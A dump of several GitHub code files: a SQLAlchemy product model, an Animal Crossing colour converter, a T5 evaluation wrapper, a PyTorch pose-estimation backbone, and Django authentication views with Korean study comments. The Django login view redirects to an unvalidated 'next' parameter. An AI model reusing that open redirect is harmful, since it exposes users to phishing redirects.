+{"seq_id": "8025761577", "text": "from sqlalchemy import Column, String, Integer, Date, Numeric, ForeignKey\nfrom base import Base\n\n\nclass Product(Base):\n __tablename__ = 'products'\n\n id = Column(Integer, primary_key=True)\n name = Column('name', String)\n code = Column('code', Integer)\n price = Column('price', Numeric)\n vendor_id = Column(Integer, ForeignKey('vendors.id'))\n\n def __init__(self, name, code, vendor_id, price=None):\n self.name = name\n self.code = code\n self.vendor_id = vendor_id\n if not price:\n self.price = None\n else:\n self.price = price\n\n def to__dict__(self):\n d = dict()\n d['id'] = self.id\n d['name'] = self.name\n d['code'] = self.code\n d['vendor_id'] = self.vendor_id\n if self.price:\n d['price'] = str(self.price)\n else:\n d['price'] = None\n return d\n", "repo_name": "barussa/bradoo", "sub_path": "model/products.py", "file_name": "products.py", "file_ext": "py", "file_size_in_byte": 897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.Base", "line_number": 5, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 8, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 8, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 9, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 10, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlalchemy.Numeric", "line_number": 11, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 12, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "23318691344", "text": "import typing\n\nfrom rgb_to_acnh import convert as _convert\n\n\ndef convert(hex: int) -> typing.Tuple[int, int, int]:\n \"\"\"Converts a 24-bit RGB hex colour to ACNH HSV\"\"\"\n return _convert((hex & 0xFF0000) >> 16, (hex & 0xFF00) >> 8, hex & 0xFF)\n\n\nif __name__ == \"__main__\":\n import sys\n from acnh_constants import hue_width, sat_width, val_width\n\n hue_slider_scale = 1\n sat_slider_scale = 1\n val_slider_scale = 1\n\n if len(sys.argv) == 1:\n hex = int(input(\"hex: \"), base=16)\n ext = \"\"\n elif len(sys.argv) >= 2:\n hex = int(sys.argv[1], base=16)\n ext = \" \".join(sys.argv[2:])\n else:\n print(\n \"Invalid number of parameters. Usage: {} [ [comment]]\".format(\n sys.argv[0]\n )\n )\n exit(1)\n\n nh, ns, nv = convert(hex)\n hue_slider = [\"░\" for i in range(hue_width)]\n hue_slider[nh] = \"█\"\n sat_slider = [\"[]\" for i in range(sat_width)]\n sat_slider[ns] = \"██\"\n val_slider = [\"[]\" for i in range(val_width)]\n val_slider[nv] = \"██\"\n\n print(\"ACNH colour is:\", ext)\n print(\n \"\".join(i * hue_slider_scale for i in hue_slider),\n f\"({nh:02} -> | <- {29-nh:02})\",\n )\n print(\n \"\".join(i * sat_slider_scale for i in sat_slider),\n f\"({ns:02} -> | <- {14-ns:02})\",\n )\n print(\n \"\".join(i * val_slider_scale for i in val_slider),\n f\"({nv:02} -> | <- {14-nv:02})\",\n )\n", "repo_name": "Starwort/dot-matrix-pattern", "sub_path": "hex_to_acnh.py", "file_name": "hex_to_acnh.py", "file_ext": "py", "file_size_in_byte": 1452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rgb_to_acnh.convert", "line_number": 8, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 28, "usage_type": "attribute"}, {"api_name": "acnh_constants.hue_width", "line_number": 34, "usage_type": "argument"}, {"api_name": "acnh_constants.sat_width", "line_number": 36, "usage_type": "argument"}, {"api_name": "acnh_constants.val_width", "line_number": 38, "usage_type": "argument"}]}
+{"seq_id": "37697696354", "text": "from abc import ABC\nfrom typing import Any, Dict, Iterator, Optional, Sequence\n\nimport more_itertools\nimport torch\nfrom tango.common import Tqdm\nfrom tango.common.sequences import MappedSequence\nfrom transformers import (\n AutoModelForSeq2SeqLM,\n AutoTokenizer,\n T5ForConditionalGeneration,\n T5TokenizerFast,\n)\n\nfrom catwalk import cached_transformers\nfrom catwalk.model import Model, UnsupportedTaskError\nfrom catwalk.task import InstanceFormat, Task\n\n_true_tensor = torch.tensor([True])\n_false_tensor = torch.tensor([False])\n\n\nclass T5Model(Model, ABC):\n def get_model(self) -> T5ForConditionalGeneration:\n raise NotImplementedError\n\n def get_tokenizer(self) -> T5TokenizerFast:\n raise NotImplementedError\n\n def _predict_qa(\n self, task: Task, instances: Sequence[Dict[str, Any]], batch_size: int = 32\n ) -> Iterator[Dict[str, Any]]:\n qas = MappedSequence(task.instance_conversions[InstanceFormat.HF_QA], instances)\n\n model = self.get_model().eval()\n tokenizer = self.get_tokenizer()\n tokenizer.model_max_length = model.config.n_positions\n\n with torch.inference_mode():\n with Tqdm.tqdm(qas, desc=\"Processing instances\") as qas_tqdm:\n for batch in more_itertools.chunked(qas_tqdm, batch_size):\n model_input = tokenizer(\n [f\"question:{i.question}\" for i in batch],\n [f\"context:{i.context}\" for i in batch],\n truncation=\"only_second\",\n padding=\"longest\",\n return_tensors=\"pt\",\n )\n\n model_output = model.generate(\n **model_input, max_new_tokens=50\n ) # 50 new tokens is also same as GPT evaluation\n model_output = tokenizer.batch_decode(\n model_output,\n clean_up_tokenization_spaces=True,\n skip_special_tokens=True,\n )\n for instance, prediction in zip(batch, model_output):\n yield {\n \"squad_metrics\": (\n {\"id\": instance.id, \"prediction_text\": prediction},\n {\"id\": instance.id, \"answers\": instance.answers},\n )\n }\n\n def _predict_prompt(\n self, task: Task, instances: Sequence[Dict[str, Any]], batch_size: int = 32\n ) -> Iterator[Dict[str, Any]]:\n prompts = MappedSequence(\n task.instance_conversions[InstanceFormat.T5_PROMPT], instances\n )\n\n model = self.get_model().eval()\n tokenizer = self.get_tokenizer()\n\n with torch.inference_mode():\n with Tqdm.tqdm(prompts, desc=\"Processing instances\") as prompts_tqdm:\n for batch in more_itertools.chunked(prompts_tqdm, batch_size):\n model_input = tokenizer(\n [i[0] for i in batch],\n padding=True,\n truncation=\"only_first\",\n return_tensors=\"pt\",\n pad_to_multiple_of=8,\n )\n model_output = model.generate(**model_input)\n model_output = tokenizer.batch_decode(\n model_output,\n clean_up_tokenization_spaces=True,\n skip_special_tokens=True,\n )\n for target, prediction in zip(batch, model_output):\n target = target[1]\n yield {\n \"acc\": (torch.Tensor([target == prediction]), _true_tensor),\n \"bleu\": ([prediction], [[target]]),\n \"rouge\": ([prediction], [[target]]),\n }\n\n def predict( # type: ignore\n self, task: Task, instances: Sequence[Dict[str, Any]], *, batch_size: int = 32\n ) -> Iterator[Dict[str, Any]]:\n if task.has_instance_conversion(InstanceFormat.T5_PROMPT):\n return self._predict_prompt(task, instances, batch_size=batch_size)\n elif task.has_instance_conversion(InstanceFormat.HF_QA):\n return self._predict_qa(task, instances, batch_size=batch_size)\n\n raise UnsupportedTaskError(self, task)\n\n\n@Model.register(\"catwalk::t5_from_pretrained\")\nclass T5ModelFromPretrained(T5Model):\n def __init__(self, 
pretrained_model_name_or_path: str):\n self.pretrained_model_name_or_path = pretrained_model_name_or_path\n\n def get_model(self) -> T5ForConditionalGeneration:\n return cached_transformers.get(\n AutoModelForSeq2SeqLM, self.pretrained_model_name_or_path, False\n )\n\n def get_tokenizer(self) -> T5TokenizerFast:\n return cached_transformers.get_tokenizer(\n T5TokenizerFast, self.pretrained_model_name_or_path\n )\n\n\n@Model.register(\"catwalk::t5_from_model\")\nclass T5ModelFromModel(T5Model):\n def __init__(\n self,\n model: T5ForConditionalGeneration,\n tokenizer: Optional[T5TokenizerFast] = None,\n ):\n self.model = model\n self.tokenizer = tokenizer\n\n def get_model(self) -> T5ForConditionalGeneration:\n return self.model\n\n def get_tokenizer(self) -> T5TokenizerFast:\n if self.tokenizer is None:\n return cached_transformers.get_tokenizer(\n T5TokenizerFast, self.get_model().name_or_path\n )\n else:\n return self.tokenizer\n", "repo_name": "allenai/catwalk", "sub_path": "catwalk/models/t5.py", "file_name": "t5.py", "file_ext": "py", "file_size_in_byte": 5630, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.tensor", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 20, "usage_type": "call"}, {"api_name": "catwalk.model.Model", "line_number": 23, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 23, "usage_type": "name"}, {"api_name": "transformers.T5ForConditionalGeneration", "line_number": 24, "usage_type": "name"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 27, "usage_type": "name"}, {"api_name": "catwalk.task.Task", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 31, "usage_type": "name"}, {"api_name": "tango.common.sequences.MappedSequence", "line_number": 33, "usage_type": "call"}, {"api_name": "catwalk.task.InstanceFormat.HF_QA", "line_number": 33, "usage_type": "attribute"}, {"api_name": "catwalk.task.InstanceFormat", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.inference_mode", "line_number": 39, "usage_type": "call"}, {"api_name": "tango.common.Tqdm.tqdm", "line_number": 40, "usage_type": "call"}, {"api_name": "tango.common.Tqdm", "line_number": 40, "usage_type": "name"}, {"api_name": "more_itertools.chunked", "line_number": 41, "usage_type": "call"}, {"api_name": "typing.Iterator", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 32, "usage_type": "name"}, {"api_name": "catwalk.task.Task", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 67, "usage_type": "name"}, {"api_name": "tango.common.sequences.MappedSequence", "line_number": 69, "usage_type": "call"}, {"api_name": "catwalk.task.InstanceFormat.T5_PROMPT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "catwalk.task.InstanceFormat", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.inference_mode", "line_number": 76, "usage_type": "call"}, {"api_name": "tango.common.Tqdm.tqdm", "line_number": 77, "usage_type": "call"}, {"api_name": "tango.common.Tqdm", "line_number": 77, 
"usage_type": "name"}, {"api_name": "more_itertools.chunked", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 95, "usage_type": "call"}, {"api_name": "typing.Iterator", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 68, "usage_type": "name"}, {"api_name": "catwalk.task.Task", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 101, "usage_type": "name"}, {"api_name": "catwalk.task.InstanceFormat.T5_PROMPT", "line_number": 103, "usage_type": "attribute"}, {"api_name": "catwalk.task.InstanceFormat", "line_number": 103, "usage_type": "name"}, {"api_name": "catwalk.task.InstanceFormat.HF_QA", "line_number": 105, "usage_type": "attribute"}, {"api_name": "catwalk.task.InstanceFormat", "line_number": 105, "usage_type": "name"}, {"api_name": "catwalk.model.UnsupportedTaskError", "line_number": 108, "usage_type": "call"}, {"api_name": "typing.Iterator", "line_number": 102, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 102, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 102, "usage_type": "name"}, {"api_name": "catwalk.cached_transformers.get", "line_number": 117, "usage_type": "call"}, {"api_name": "transformers.AutoModelForSeq2SeqLM", "line_number": 118, "usage_type": "argument"}, {"api_name": "catwalk.cached_transformers", "line_number": 117, "usage_type": "name"}, {"api_name": "transformers.T5ForConditionalGeneration", "line_number": 116, "usage_type": "name"}, {"api_name": "catwalk.cached_transformers.get_tokenizer", "line_number": 122, "usage_type": "call"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 123, "usage_type": "argument"}, {"api_name": "catwalk.cached_transformers", "line_number": 122, "usage_type": "name"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 121, "usage_type": "name"}, {"api_name": "catwalk.model.Model.register", "line_number": 111, "usage_type": "call"}, {"api_name": "catwalk.model.Model", "line_number": 111, "usage_type": "name"}, {"api_name": "transformers.T5ForConditionalGeneration", "line_number": 131, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 132, "usage_type": "name"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 132, "usage_type": "name"}, {"api_name": "transformers.T5ForConditionalGeneration", "line_number": 137, "usage_type": "name"}, {"api_name": "catwalk.cached_transformers.get_tokenizer", "line_number": 142, "usage_type": "call"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 143, "usage_type": "argument"}, {"api_name": "catwalk.cached_transformers", "line_number": 142, "usage_type": "name"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 140, "usage_type": "name"}, {"api_name": "catwalk.model.Model.register", "line_number": 127, "usage_type": "call"}, {"api_name": "catwalk.model.Model", "line_number": 127, "usage_type": "name"}]}
+{"seq_id": "37638723488", "text": "import argparse\nimport torch.nn as nn\nimport torch\n\ndef _make_divisible(v, divisor, min_value=None):\n \"\"\"\n This function is taken from the original tf repo. It ensures that all layers have a channel number that is divisible by 8\n It can be seen here: https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\n :param v:\n :param divisor:\n :param min_value:\n :return:\n \"\"\"\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\nclass DeConv(nn.Sequential):\n def __init__(self, in_ch, mid_ch, out_ch, ):\n super(DeConv, self).__init__(\n nn.Conv2d(in_ch + mid_ch, mid_ch, kernel_size=1),\n nn.BatchNorm2d(mid_ch),\n nn.PReLU(mid_ch),\n nn.Conv2d(mid_ch, out_ch, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_ch),\n nn.PReLU(out_ch),\n nn.UpsamplingBilinear2d(scale_factor=2)\n )\n\nclass ConvBNReLU(nn.Sequential):\n def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1):\n padding = (kernel_size - 1) // 2\n super(ConvBNReLU, self).__init__(\n nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.PReLU(out_planes)\n )\n\nclass InvertedResidual(nn.Module):\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n\n hidden_dim = int(round(inp * expand_ratio))\n self.use_res_connect = self.stride == 1 and inp == oup\n\n layers = []\n if expand_ratio != 1:\n # pw\n layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1))\n layers.extend([\n # dw\n ConvBNReLU(hidden_dim, hidden_dim, stride=stride, groups=hidden_dim),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n ])\n self.conv = nn.Sequential(*layers)\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\nclass SKBackbone(nn.Module):\n def __init__(self,\n args):\n super(SKBackbone, self).__init__()\n\n assert args.input_size[1] in [256]\n\n inverted_residual_setting = [\n [1, 64, 1, 2], #[-1, 48, 256, 256]\n [6, 48, 2, 2], #[-1, 48, 128, 128]\n [6, 48, 3, 2], #[-1, 48, 64, 64]\n [6, 64, 4, 2], #[-1, 64, 32, 32]\n [6, 96, 3, 2], #[-1, 96, 16, 16]\n [6, 160, 3, 1], #[-1, 160, 8, 8]\n [6, 320, 1, 1], #[-1, 320, 8, 8]\n ]\n\n # building first layer\n input_channel = _make_divisible(args.input_channel * args.width_mult, args.round_nearest)\n\n self.first_conv = ConvBNReLU(3, input_channel, stride=2)\n\n inv_residual = []\n # building inverted residual InvertedResiduals\n for t, c, n, s in inverted_residual_setting:\n output_channel = _make_divisible(c * args.width_mult, args.round_nearest)\n for i in range(n):\n stride = s if i == 0 else 1\n inv_residual.append(InvertedResidual(input_channel, output_channel, stride, expand_ratio=t))\n input_channel = output_channel\n # make it nn.Sequential\n self.inv_residual = nn.Sequential(*inv_residual)\n\n self.last_conv = ConvBNReLU(input_channel, args.embedding_size, kernel_size=1)\n self.final_layer = nn.Conv2d(\n in_channels=256,\n out_channels= args.num_keypoints * 32,\n kernel_size=1,\n stride=1,\n padding=0\n )\n\n def forward(self, x):\n x = self.first_conv(x)\n x = self.inv_residual[0:6](x)\n x2 = x\n x = self.inv_residual[6:10](x)\n x1 = x\n x = 
self.inv_residual[10:13](x)\n x0 = x\n x = self.inv_residual[13:16](x)\n x = self.inv_residual[16:](x)\n y = self.last_conv(x)\n\n return x0,x1,x2,y\n\n def init_weights(self):\n for j in [self.first_conv, self.inv_residual, self.last_conv]:\n for m in j.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.normal_(m.weight, std=0.001)\n if hasattr(m, 'bias'):\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\ndef msknet_config(parser):\n\n '''\n input_size,\n joint_num,\n input_channel = 48,\n embedding_size = 2048,\n width_mult=1.0,\n round_nearest=8,\n InvertedResidual=None,\n norm_layer=None,\n nn.PReLU=None,\n inverted_residual_setting=None\n '''\n parser.add_argument('--num_keypoints', type=int,\n default=16)\n parser.add_argument('--input_size', type=tuple,\n default=(256,256))\n parser.add_argument('--input_channel', type=int,\n default=48)\n parser.add_argument('--embedding_size', type = int ,default = 2048)\n parser.add_argument('--width_mult', type = float ,default = 1.0)\n\n parser.add_argument('--round_nearest', type = int ,default = 8)\n \n return parser\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Arguments for person pose estimation tester')\n \n model = SKBackbone(msknet_config(parser).parse_args(args=[]))\n test_data = torch.rand(1, 3, 256, 256)\n test_outputs = model(test_data)\n x,y,z,w = test_outputs\n print(x.size())\n print(y.size())\n print(z.size())\n print(w.size())\n\n", "repo_name": "qhtLucifer/fall-person-recognition", "sub_path": "models/MSKNet/backbone/backbone.py", "file_name": "backbone.py", "file_ext": "py", "file_size_in_byte": 6020, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Sequential", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.UpsamplingBilinear2d", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 43, 
"usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 130, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 131, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 131, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 134, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 164, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 168, "usage_type": "call"}]}
+{"seq_id": "70020438888", "text": "from django.shortcuts import render, redirect\n# detail에서 User 참조할 때 from .models import User 사용금지\n# from .models import User 사용금지\nfrom django.contrib.auth import get_user_model\n# 로그인 세션\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\n# 로그인 form\nfrom django.contrib.auth.forms import AuthenticationForm\n# 인증과 관련된 곳에 UserCreationForm = 회원가입 form = user과 연결된 ModelForm\n# from django.contrib.auth.forms import UserCreationForm\n# from .forms import CustomUserCreationForm\nfrom .forms import CustomUserChangeForm, CustomUserCreationForm\n\n\n\n# Create your views here.\n# 3. CustomUserCreationForm 사용 (accounts에 정의한 User로 변경)\n# settings.py의 기본 설정은 auth.User였는데 accounts.User로 변경했음\n# 그래서 CustonUserCreationForm으로 변경\n# 장고에 내제되어 있는 Form 사용\ndef signup(request):\n # POST 요청 처리\n # request의 method가 POST라면 회원가입 처리를 해줘야 하고\n if request.method == 'POST':\n # ModelForm로직의 기본\n # 유효성 검사\n # 사용자가 입력한 값을(request.POST) form에 넣음\n form = CustomUserCreationForm(request.POST)\n # 질문: valid한가? \n if form.is_valid():\n form.save()\n return redirect('articles:index')\n # GET 요청일 때\n # 나머지는, GET 요청일때는 Form을 UserCreationForm을 넣어서 \n else:\n form = CustomUserCreationForm()\n # signup.html에 {{ form.as_p }}로 사용함\n context = {\n 'form': form\n }\n return render(request, 'accounts/signup.html', context)\n\n\n'''\n1. 회원가입 form 제공 기능\n\ndef signup(request):\n # 회원가입 form\n form = UserCreationForm()\n # signup.html에 {{ form.as_p }}로 사용함\n context = {\n 'form': form\n }\n return render(request, 'accounts/signup.html', context)\n'''\n\n\n'''\n2. UserCreationForm 사용\n\ndef signup(request):\n # POST 요청 처리\n # request의 method가 POST라면 회원가입 처리를 해줘야 하고\n if request.method == 'POST':\n # ModelForm로직의 기본\n # 유효성 검사\n # 사용자가 입력한 값을(request.POST) form에 넣음\n form = UserCreationForm(request.POST)\n # 질문: valid한가? \n if form.is_valid():\n form.save()\n return redirect('articles:index')\n # GET 요청일 때\n # 나머지는, GET 요청일때는 Form을 UserCreationForm을 넣어서 \n else:\n form = UserCreationForm()\n # signup.html에 {{ form.as_p }}로 사용함\n context = {\n 'form': form\n }\n return render(request, 'accounts/signup.html', context)\n\n\n'''\n\n# User class 참조하는 것만 다름\ndef detail(request, pk):\n # User 정보를 받아오는 쿼리셋 API \n # User class 참조할 때 어떻게 작성? 
from .models import User가 아닌 from django.contrib.auth import get_user_model\n # user = User.objects.get(pk=pk), User가 아닌 get_user_model()\n user = get_user_model().objects.get(pk=pk)\n context = {\n 'user': user\n }\n return render(request, 'accounts/detail.html', context)\n\n\ndef login(request):\n # 로그인 로직 추가\n if request.method == 'POST':\n # AuthenticationForm은 ModelForm이 아님\n # data의 argument로 request에 POST가 들어올 것 같음\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n # ModelForm이 아니라서 save() 없음\n # form.save()\n # 이곳에 들어갈 로직은?\n # 세션에 저장, 로그인 함수가 내장되어 있음\n # User정보를 form으로부터 가져올 수 있음\n # login 함수는 request와 user 객체를 인자로 받음\n # user 객체는 form에서 인증된 user 정보를 받을 수 있음\n auth_login(request, form.get_user())\n # request.GET.get('next') : /articles/1/update/\n # request.GET.get('next'), 이 값에 따라서 조건문을 만든다\n return redirect(request.GET.get('next') or 'articles:index') \n else:\n # form 처리 한다고 로그인이 되는 것은 아니여서 로작을 추가해야 한다\n form = AuthenticationForm()\n context = {\n 'form': form\n }\n return render(request, 'accounts/login.html', context)\n\n\n\ndef logout(request):\n auth_logout(request)\n return redirect('articles:index')\n\n\n\n@login_required\ndef update(request):\n if request.method == 'POST':\n form = CustomUserChangeForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n return redirect('accounts:detail', request.user.pk)\n else:\n form = CustomUserChangeForm(instance=request.user)\n context = {\n 'form': form\n }\n return render(request, 'accounts/update.html', context)", "repo_name": "astroastrum/Django", "sub_path": "test_1013/accounts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5027, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "forms.CustomUserCreationForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "forms.CustomUserCreationForm", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 97, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 105, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 114, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 117, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 120, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 124, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 129, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 130, "usage_type": "call"}, {"api_name": "forms.CustomUserChangeForm", "line_number": 137, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 140, "usage_type": "call"}, {"api_name": "forms.CustomUserChangeForm", "line_number": 142, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 134, "usage_type": "name"}]}
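
The views above import CustomUserCreationForm and CustomUserChangeForm from .forms, a file this record does not include. A plausible sketch of that forms.py, following the standard Django pattern for custom user models; the fields on the change form are an assumption, not the repo's actual choice:

from django.contrib.auth import get_user_model
from django.contrib.auth.forms import UserCreationForm, UserChangeForm

class CustomUserCreationForm(UserCreationForm):
    class Meta(UserCreationForm.Meta):
        # bind to whatever AUTH_USER_MODEL points at instead of hardcoding auth.User
        model = get_user_model()
        fields = UserCreationForm.Meta.fields

class CustomUserChangeForm(UserChangeForm):
    class Meta(UserChangeForm.Meta):
        model = get_user_model()
        fields = ('username', 'email')  # assumed subset; the real file may differ
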
